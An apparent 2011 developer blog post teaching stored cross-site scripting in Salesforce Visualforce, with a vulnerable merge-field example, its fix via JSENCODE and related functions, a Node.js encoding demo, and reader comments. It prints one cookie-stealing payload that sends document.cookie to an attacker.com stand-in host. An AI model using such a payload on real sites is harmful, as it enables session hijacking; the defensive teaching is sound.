Tuesday, 1 March 2011

Salesforce applications with security : Stored XSS

Continuing from my previous post, this time I would like to share some knowledge on the Stored XSS part.
Stored XSS is cross-site scripting where an attacker can inject code into server pages permanently, and these scripts run whenever some action is made on the page.

In other words :
"Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information."

Let's have an example:

<script>
    function crossXSS() {
        // Vulnerable: the merge field is dropped straight into a JavaScript string literal
        var xssExample = '{!Account.Name}';
    }
</script>
<apex:commandLink value="Click me" onclick="crossXSS();" />

Now suppose the Account Name is:
testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So this account name will always be on the page inside the script block, and whenever the commandLink is clicked "crossXSS" will be called and its body will read as follows:
var xssExample = 'testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So again you can see here that all the cookies will be sent to the attacker.com site.

I suggested this in the previous blog, but I am repeating all those things again :).

To prevent this, Salesforce provides encoding functions that are available on a Visualforce page, such as JSENCODE, HTMLENCODE, JSINHTMLENCODE and URLENCODE.

So the code explained above can be updated as:
var xssExample = '{!JSENCODE(Account.Name)}';

So the value merged into the page will now be encoded before it reaches the script.
JSENCODE: To encode values placed inside JavaScript.
HTMLENCODE: To encode values rendered as HTML.
JSINHTMLENCODE: If calling a JavaScript method from an HTML component and passing the values.
URLENCODE: If building a URL on the page.
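As an added example (not code from this post, and not Salesforce's own implementation), here is a Node.js stand-in for JSENCODE that lets you see offline why the raw merge field above is dangerous and what the encoded version changes. The escape table in jsEncode is an assumption modelled on JSENCODE's documented purpose (escaping quotes, backslashes and line terminators so a value cannot leave its JavaScript string literal); the real function runs server-side inside Salesforce and may differ in detail. The sample account names are constructed, not real data.

```javascript
// Added example, not from the original post: a Node.js stand-in for
// Visualforce's JSENCODE. The escape table is an assumption modelled on
// JSENCODE's documented purpose (escape quotes, backslashes and line
// terminators so a value stays inside its JavaScript string literal); the
// real function runs server-side in Salesforce and may differ in detail.
function jsEncode(value) {
  const table = {
    "\\": "\\\\", "'": "\\'", '"': '\\"',
    "\n": "\\n", "\r": "\\r", "\u2028": "\\u2028", "\u2029": "\\u2029",
  };
  return String(value).replace(/[\\'"\n\r\u2028\u2029]/g, (ch) => table[ch]);
}

// Build the same script line the post renders, with the merge field either
// inserted as-is (the vulnerable page) or passed through jsEncode (the fix).
function renderScript(accountName, encode) {
  const merged = encode ? jsEncode(accountName) : accountName;
  return `var xssExample = '${merged}';`;
}

// Parse and run the rendered line in an isolated function scope, the way a
// browser would, and report what xssExample ended up holding. A SyntaxError,
// or a value different from the account name, means data was parsed as code.
function evaluate(script) {
  try {
    const fn = new Function(script + "\nreturn xssExample;");
    return { ok: true, value: fn() };
  } catch (err) {
    return { ok: false, error: err.constructor.name };
  }
}

// Defender's check: does the account name survive the round trip unchanged
// once it is encoded? That is the property JSENCODE exists to guarantee.
function isSafelyMerged(accountName) {
  const result = evaluate(renderScript(accountName, true));
  return result.ok && result.value === accountName;
}

// Constructed sample names (not real data): a legitimate name containing an
// apostrophe, and one shaped like the post's example that closes the string
// literal and appends statements of its own.
const SAMPLE_NAMES = [
  "O'Neil Industries",
  "testName'; var injected = true; var tail = '",
];

if (typeof require !== "undefined" && require.main === module) {
  for (const name of SAMPLE_NAMES) {
    console.log("raw:     ", renderScript(name, false), "->", evaluate(renderScript(name, false)));
    console.log("encoded: ", renderScript(name, true), "->", evaluate(renderScript(name, true)));
    console.log("safe with encoding:", isSafelyMerged(name));
  }
}
```

Run it with node and compare the two lines per name: the raw rendering either fails to parse (the apostrophe in a perfectly legitimate name) or silently turns the tail of the name into extra statements, while the encoded rendering returns the exact name as a string both times. The same round-trip check is a cheap unit test to keep around for any template that places a field inside a script block.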

Please feel free to ask the questions/doubts. Suggestions are appreciated.


  1. var xssExample = '{!JSENCODE(Account.Name})' ;
    Invalid argument!!!!!!
    How to encode? I tried all the ways.

  2. Hi Amit, your order of closing bracket is wrong.
    Try with {!JSENCODE(Account.Name)}

  3. Hi, I am using this to read the parameter.
    Before passing it to the URL, I encode the parameter using JSENCODE in the JavaScript function.

    The following line in controller reads the parameter

    String temp = System.currentPageReference().getParameters().get('Amt');
    is there a risk?


  4. Hi Srikanta M,

    There is no risk at all, but if you want to use this variable in a dynamic query then you need to "escapeSingleQuotes" it, like String.escapeSingleQuotes(temp), before using it in dynamic SOQL.

    Deepak Choudhary